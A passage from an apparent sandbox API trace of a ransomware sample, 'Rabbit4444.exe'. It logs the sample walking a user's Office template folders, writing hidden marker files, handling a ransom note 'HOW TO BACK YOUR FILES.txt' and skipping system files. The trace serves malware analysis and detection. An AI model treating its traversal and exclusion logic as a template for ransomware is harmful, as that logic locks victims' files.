lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0052.470] FlushFileBuffers (hFile=0x27c) returned 1 [0052.471] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.471] CloseHandle (hObject=0x27c) returned 1 [0052.472] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033") returned 92 [0052.472] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.472] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x183f9c5e, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x183f9c5e, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0xe897852b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102850 [0052.472] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.472] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.472] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0052.472] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.472] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x183f9c5e, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x183f9c5e, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0xe897852b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.472] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.472] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.472] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0052.472] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.472] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.472] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe897852b, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe897852b, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe899e769, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.472] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.472] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.472] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe897852b, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe897852b, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe899e769, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0052.472] FindClose (in: hFindFile=0x102850 | out: hFindFile=0x102850) returned 1 [0052.472] lstrcpyW (in: lpString1=0x130ebf2, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.472] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\user\\document themes\\1033\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0052.473] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0052.473] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0052.473] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0052.473] CloseHandle (hObject=0x278) returned 1 [0052.473] CloseHandle (hObject=0x27c) returned 1 [0052.473] GetCurrentThreadId () returned 0xd98 [0052.473] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x120778 [0052.473] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed" [0052.473] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1139b8 | out: hHeap=0xe0000) returned 1 [0052.473] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x120770 | out: hHeap=0xe0000) returned 1 [0052.473] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed" [0052.473] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\" [0052.473] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\.BFC0E91B00AE8A0620D3" [0052.473] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0052.475] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0052.478] FlushFileBuffers (hFile=0x27c) returned 1 [0052.478] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.479] CloseHandle (hObject=0x27c) returned 1 [0052.479] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed") returned 74 [0052.479] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.479] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x183f9c5e, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x183f9c5e, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0xe899e769, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1027d0 [0052.479] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.479] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.479] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0052.479] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.479] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x183f9c5e, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x183f9c5e, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0xe899e769, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.479] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.479] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.479] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0052.480] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.480] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.480] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe899e769, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe899e769, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe899e769, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.480] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.480] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.480] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x183f9c5e, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x183f9c5e, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x183f9c5e, ftLastWriteTime.dwHighDateTime=0x1d327b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Document Themes", cAlternateFileName="DOCUME~1")) returned 1 [0052.480] lstrcmpiW (lpString1="Document Themes", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.480] lstrcmpiW (lpString1="Document Themes", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.480] lstrcmpiW (lpString1="Document Themes", lpString2="Rabbit4444.exe") returned -1 [0052.480] lstrcmpiW (lpString1="Document Themes", lpString2=".") returned 1 [0052.480] lstrcmpiW (lpString1="Document Themes", lpString2="..") returned 1 [0052.480] lstrcmpiW (lpString1="Document Themes", lpString2="windows") returned -1 [0052.480] lstrcmpiW (lpString1="Document Themes", lpString2="bootmgr") returned 1 [0052.480] lstrcmpiW (lpString1="Document Themes", lpString2="pagefile.sys") returned -1 [0052.480] lstrcmpiW (lpString1="Document Themes", lpString2="boot") returned 1 [0052.480] lstrcmpiW (lpString1="Document Themes", lpString2="ids.txt") returned -1 [0052.480] lstrcmpiW (lpString1="Document Themes", lpString2="NTUSER.DAT") returned -1 [0052.480] lstrcpyW (in: lpString1=0x130ebce, lpString2="Document Themes" | out: lpString1="Document Themes") returned="Document Themes" [0052.480] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x120870 [0052.480] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb6) returned 0xefd18 [0052.480] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x120878 | out: ListHead=0xf68b0, ListEntry=0x120878) returned 0x120538 [0052.480] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x183f9c5e, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x183f9c5e, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x183f9c5e, ftLastWriteTime.dwHighDateTime=0x1d327b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Document Themes", cAlternateFileName="DOCUME~1")) returned 0 [0052.480] FindClose (in: hFindFile=0x1027d0 | out: hFindFile=0x1027d0) returned 1 [0052.480] lstrcpyW (in: lpString1=0x130ebce, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.480] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0052.482] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0052.482] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0052.482] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0052.482] CloseHandle (hObject=0x278) returned 1 [0052.482] CloseHandle (hObject=0x27c) returned 1 [0052.482] GetCurrentThreadId () returned 0xd98 [0052.482] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x120878 [0052.482] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes" [0052.482] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xefd18 | out: hHeap=0xe0000) returned 1 [0052.482] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x120870 | out: hHeap=0xe0000) returned 1 [0052.483] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes" [0052.483] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\" [0052.483] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\.BFC0E91B00AE8A0620D3" [0052.483] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0052.484] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0052.486] FlushFileBuffers (hFile=0x27c) returned 1 [0052.487] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.487] CloseHandle (hObject=0x27c) returned 1 [0052.488] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes") returned 90 [0052.488] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.488] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x183f9c5e, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x183f9c5e, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0xe899e769, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0052.488] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.488] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.488] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0052.488] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.488] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x183f9c5e, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x183f9c5e, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0xe899e769, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.488] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.488] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.488] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0052.488] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.488] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.488] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe899e769, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe899e769, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe89c4c88, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.488] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.488] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.488] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x183f9c5e, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x183f9c5e, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x183f9c5e, ftLastWriteTime.dwHighDateTime=0x1d327b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0052.488] lstrcmpiW (lpString1="1033", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.488] lstrcmpiW (lpString1="1033", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.488] lstrcmpiW (lpString1="1033", lpString2="Rabbit4444.exe") returned -1 [0052.488] lstrcmpiW (lpString1="1033", lpString2=".") returned 1 [0052.488] lstrcmpiW (lpString1="1033", lpString2="..") returned 1 [0052.488] lstrcmpiW (lpString1="1033", lpString2="windows") returned -1 [0052.488] lstrcmpiW (lpString1="1033", lpString2="bootmgr") returned -1 [0052.488] lstrcmpiW (lpString1="1033", lpString2="pagefile.sys") returned -1 [0052.488] lstrcmpiW (lpString1="1033", lpString2="boot") returned -1 [0052.488] lstrcmpiW (lpString1="1033", lpString2="ids.txt") returned -1 [0052.488] lstrcmpiW (lpString1="1033", lpString2="NTUSER.DAT") returned -1 [0052.488] lstrcpyW (in: lpString1=0x130ebee, lpString2="1033" | out: lpString1="1033") returned="1033" [0052.489] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x120730 [0052.489] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xc0) returned 0xefd18 [0052.489] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x120738 | out: ListHead=0xf68b0, ListEntry=0x120738) returned 0x120538 [0052.489] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x183f9c5e, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x183f9c5e, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x183f9c5e, ftLastWriteTime.dwHighDateTime=0x1d327b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 0 [0052.489] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0052.489] lstrcpyW (in: lpString1=0x130ebee, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.489] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0052.491] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0052.491] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0052.491] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0052.491] CloseHandle (hObject=0x278) returned 1 [0052.491] CloseHandle (hObject=0x27c) returned 1 [0052.491] GetCurrentThreadId () returned 0xd98 [0052.491] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x120738 [0052.491] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033" [0052.491] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xefd18 | out: hHeap=0xe0000) returned 1 [0052.491] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x120730 | out: hHeap=0xe0000) returned 1 [0052.491] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033" [0052.491] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\" [0052.491] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\.BFC0E91B00AE8A0620D3" [0052.492] CreateFileW 